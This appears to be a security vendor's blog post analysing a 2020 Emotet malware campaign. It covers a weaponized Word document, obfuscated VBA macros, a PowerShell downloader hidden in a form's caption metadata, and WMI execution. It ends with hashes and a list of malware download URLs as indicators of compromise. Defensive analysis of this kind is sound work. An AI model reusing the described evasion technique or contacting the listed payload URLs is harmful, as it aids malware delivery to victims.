The security community has enjoyed a few months of silence from Emotet, an advanced and evasive malware threat, since February of this year. But the silence was broken in July as the VMware Threat Analysis Unit (TAU) observed a major new Emotet campaign and, since then, fresh attacks have continued to surface. What caught the attention of VMware TAU is that the security community still lacks the capacity to effectively detect and prevent Emotet, even though it first appeared in 2014. As an example of this, Figure 1 shows the detection status on VirusTotal for one of the weaponized documents from a recent Emotet attack. Only about 25% of antivirus engines blocked the file, even though the key techniques — such as a base64-encoded PowerShell script used to download the Emotet payload from one of five URLs — are nothing new. (These results were checked five days after they were first submitted to VirusTotal.)

Detection of an Emotet-Related Document on VirusTotal

Figure 1: Detection of an Emotet-related document on VirusTotal

In this blog post, we’ll investigate the first stage of the recent Emotet attacks by analyzing one of the samples from the recent campaign to reveal the tactics, techniques, and procedures (TTPs) used. This will help us understand how this malware was able to escape detection from a majority of antivirus engines.

What is Emotet?

Emotet is a Trojan that mainly spreads through spam emails, disseminated by a cyber group called Mealybug, that contain either malicious macro-enabled documents or links. Emotet is one of the most dangerous botnets, as it enables criminals to effectively monetize attacks via information theft, email harvesting, and ransomware distribution. Figure 2 illustrates the evolution of Emotet since it was first discovered in 2014. Current versions of Emotet have been employed as downloaders for other malware, such as the banking Trojans TrickBot, Qakbot, and Ryuk ransomware.

The Evolution of Emotet

Figure 2: The evolution of Emotet

Let’s examine a typical Emotet infection chain, as shown in Figure 3. The infection chain starts with a spam or phishing email. A successful attack is achieved via a few steps: the first step requires a recipient to open a weaponized Word document attached to an email; the document typically contains some social engineering text that is used to entice the victim to enable VBA macro execution in Microsoft Word (which is normally disabled by default). Once VBA macro execution is enabled, the embedded VBA macro executes, which then triggers an embedded PowerShell script to download and execute the Emotet final payload.

A Typical Emotet Infection Chain

Figure 3: A typical Emotet infection chain

To increase the infection rate, Emotet leverages some common attack tricks, such as social engineering techniques, obfuscated VBA macros, and advanced adversary techniques like hidden PowerShell scripts. This explains why most signature-based detection engines fail to catch new malware variants like the recently observed Emotet attacks. In the following sections, we describe in detail the TTPs used in the recent Emotet infection chain, and we explain how those TTPs enable Emotet to evade static detection.

Unpacking Recent Emotet Attacks

Last month, we saw two major Emotet waves attacking our customers, occurring on August 7 and August 10. Figure 4 shows the detection timeline from this period.

Emotet Attacks That Affected VMware Customers

Figure 4: Detection timeline of Emotet that affected VMware customers from both EMEA and US regions

The attacks used some common techniques, such as data obfuscation and VBA and PowerShell scripting, as shown in Table 1.

 
Initial Access Execution Defense Evasion
SpearphishingAttachment PowerShell Obfuscated Files or Information
Visual Basic Deobfuscate/Decode Files or Information
Malicious File Hidden Window
Windows Management Instrumentation (WMI)

Table 1: Tactics and techniques used by the downloader

All the samples we checked fall into the following category: the Word document has a typically obfuscated VBA macro, but the PowerShell script is stored as caption metadata in a hidden userform object (more details on this below). The documents feature both conventional names, such as Form – Aug 07, 2020.doc, invoices 00436 & 9445.doc, PO# 08102020Ex.doc, as well as, unsurprisingly, Covid-19 themed names, like COVID-19 report 08 07 2020.doc.

MD5 40961300e6ae0ebbb65cd47c6daa4413
SHA1 032d9de3513b370abbe41803ed792d3bf92b834e
SHA256 dba1dec44b054e17d9551d8832427bbca55d0e7fe1e15bc527e406cdc03628d1
File name Form – Aug 07, 2020.doc, COVID-19 report 08 07 2020.doc
Size 173767 bytes
Type application/msoffice-doc

Table 2: A typical Emotet-weaponized Word document from the attacks

The Emotet downloader

To investigate the attacks, we analyzed one of the samples from the campaign, as shown in Table 2. This is a typical single-page weaponized document, which contains the usual social engineering texts as shown in Figure 5. In this case, the malware writer tries to entice the victim to enable VBA macro execution by stating that the file was created on an iOS device.

A Typical Single-page Weaponized Document

Figure 5: The opening page from the sample listed in Table 2

As we’ve seen in typical document-based attacks, the file contains highly-obfuscated VBA macros. If macros are enabled, the embedded VBA script will be executed. Figure 6 shows a snippet of the macros. The highlighted code is a human-unreadable macro snippet that creates the infamous winmgmts:Win32_Process WMI class object to invoke PowerShell processes.

In past attacks, we could still see traces of the string “winmgmts:Win32” or “PowerShell” in the obfuscated macros. This is important, because most signature-based detections heuristics are based on string patterns, created by human analysts via static analysis. If certain patterns match, detection is triggered. But in the recent Emotet attacks, it’s almost impossible to detect any traces of the class and application names, thanks to the extreme obfuscation of the macros. This partly explains why the attacks successfully evaded many signature-based detection engines.

Obfuscated VBA Macros

Figure 6: Obfuscated VBA macros

Emotet is well-known for leveraging WMI and PowerShell to launch attacks. Therefore, it’s crucial to identify the malicious PowerShell script. The main VBA module extracted from the file is not particularly long, and therefore we believe that some of the payload may be stored in other OLE objects. This is a common tactic used by attackers. Inspecting the macros reveals an interesting line in the code, which seems to load some content from an object’s page (with index as 1) caption metadata, as shown in Figure 7.

Load an Object’s Page “Caption” Metadata

Figure 7: Load an object’s page “Caption” metadata

The page “Caption” metadata is related to a multipage control object with page tabs from a hidden form, as shown in Figure 8. Leveraging form controls is a known technique of malware writers.

PowerShell Script Stored in Page2 “Caption” in a Form

Figure 8: PowerShell script stored in Page2 “Caption” in a form

It turns out that the string value for the page caption is extremely long. Figure 9 shows part of the string.

Figure 9: Highly-obfuscated long string extracted from the form page “Caption”

According to Figure 7, this string is saved in a variable q, which is passed to a function for de-obfuscation, as shown below.

Figure 10: De-obfuscate the PowerShell script

This is actually a de-obfuscation process to generate the working PowerShell script. The decoded content is shown in Figure 11. Here we see the familiar base64-encoded PowerShell script used in most Emotet attacks.

Base64-Encoded PowerShell Script

Figure 11: Base64-encoded PowerShell script

After decoding the base64-encoded script, removing garbage code, and renaming some variables, we see the functionality of the script, as shown in Figure 12. The script tries to download an Emotet payload (depending on which URL responds)from one of five URLs on to the victim’s machine, then executes it by calling the create method in the WMI class.

Figure 12: Decoded and cleaned-up PowerShell script

Once the obfuscated PowerShell script is loaded from the caption metadata (as in Figure 7) and de-obfuscated (as in Figure 9), the PowerShell process is invoked using the create method in the WMI class, as shown in Figure 13 below.

Invoke PowerShell Process via WMI

Figure 13: Invoke PowerShell process via WMI

Figure 14 shows the fishbone chart detailing the infection chain in a controlled environment when executing the VBA and PowerShell scripts in the document file. As we can see, it involves a few interesting subjects, such as powershell.exe (subject 2), the Emotet Trojan 498.exe (subject 4) and the second stage payload (subject 5).

Emotet Downloader Infection Chain

Figure 14: Emotet downloader infection chain

Conclusion

In the attacks discussed above, Emotet successfully leveraged various techniques to maximize its infection rate. As with typical Emotet attacks, the infection process starts with a spam campaign using phishing emails with attached, weaponized Word documents. Our findings show that evasion techniques used in the attacks, such as heavily obfuscating VBA macros and leveraging form controls like multipage captioning to hide a PowerShell script, have proved to be very effective in defeating signature-based detection. This kind of detection-avoidance has made Emotet one of the most dangerous malware threats today. It is expected that Emotet will continue to evolve its TTPs over time to remain undetected — and that fact imposes significant challenges on detection engines that are heavily dependent on signatures. On the other hand, behavior-based approaches, such as VMware’s AI-driven Advanced Threat Analyzer, show great effectiveness in defeating attacks that leverage the techniques discussed above.

 

Appendix: IoCs

Documents

032d9de3513b370abbe41803ed792d3bf92b834e

050e4c41bd4acc1439cbbfbb42eedac7923a7ace

3502325c4848d128dad178496a3a63db5ffce596

38d7fe7b67c4744b1ea129902da7c0c4f6079c5b

3b668d0315a5c973c010956dc73c6ee67960df0a

55a39e39e465c5e7195edc35a7b79baf19523d8d

5bb788d4f08e559b5c44cb54e5ca9097407ba639

78790e98a1613349f59fe47960dcc11a841779fe

920a801cdb3aa8dbfd6d23250710ce1090d801af

a05ff124870e9c624ccd9e28700fd86a8f4dad97

a767cde497f995313bb0ff7688354e37aa39d5de

ecb6c30560991d0217d0248eb50180697b234d15

Download URLs

://bloggingbow.com/temp/pVFQL089825/

://camhighlight.com/bin/CJGrvqny/

://chicagoyachtguru.com/site/v3cu_1p9f_0s6a/

://crucial.co.jp/wp-content/T54s8h033/

://focalaudiodesign[.]com/wp-content/3j_g08k2_6s/

://goodluckstoneshop.com/img/bxJ7986/

://goodnessgraciously.com/wordpress/KMlzOaOj/

://laijie88.com/v7ql/6ru_8itd_e6n4mer/

://microcommindia[.]com/css/9wu_sjp_rvn/

://mikeflavell[.]com/cgi-bin/akmt_4ns_bau/

://minimocha2u.com/ehlmy/LHZQclWq/

://mobiletech[.]net/images/TnpY/

://mosdk[.]com/img/bg/css/ymiu_ow_uiatk/

://mx2interests[.]com/gulf/dhcWCM/

://netflick4u.com/wp-content/sQC4dl/

://overcreative[.]com/css/fgn_al1_gav0/

://pnaia.com/wp-content/uTaZ22994/

://rebeltraiteur.com/kqcij/x0uw_3_sd58cj6xl/

://rouxweb[.]com/sea/IOm310/

://safariilab.com/old-safariilab/9_k1_jgw/

://sallyabbeyarts[.]com/SALLY_ART_2014/UqN4k/

://sososothemes.com/scbsn/s_ud_hlqsv5mhub/

://tripatory.com/wp-admin/zvxarrh54123/

://webstack.com[.]au/wp-includes/U890802/

://zeugmarotary.org/wp-admin./omlbGyZY/

Emotet payloads

15ba30657d317fa0692f8b711da2823f2f08b6ab

1ade6979f54b2b091620f206145b463abae13592

203f0ae10b208abb31c2abcaeb3aa3df83f01118

4128cd7bd19c653af849c05704832e333eba2e35

5e2b52181d97e06e03ba4ac9ac128ef05af8c79d

9cb505ee9b830257219e3ef038654398d5027b91

a26a3dd52e96153b1c2b5025b6ccac6ea1b4098f

ac6d188d96c7d20218c8f8d6136373bcbfe5f679

bd152e9d2ccfda578a85bc048e9b1fd5b6b5162b

bee5af84fc44a2c74099bbe60d3a53c8fb7c1e8a

c16536194239d631ea894932ea3344bc2f7b9ebf

de73370a16d48b5529d3bcde915d9c5d4de4e962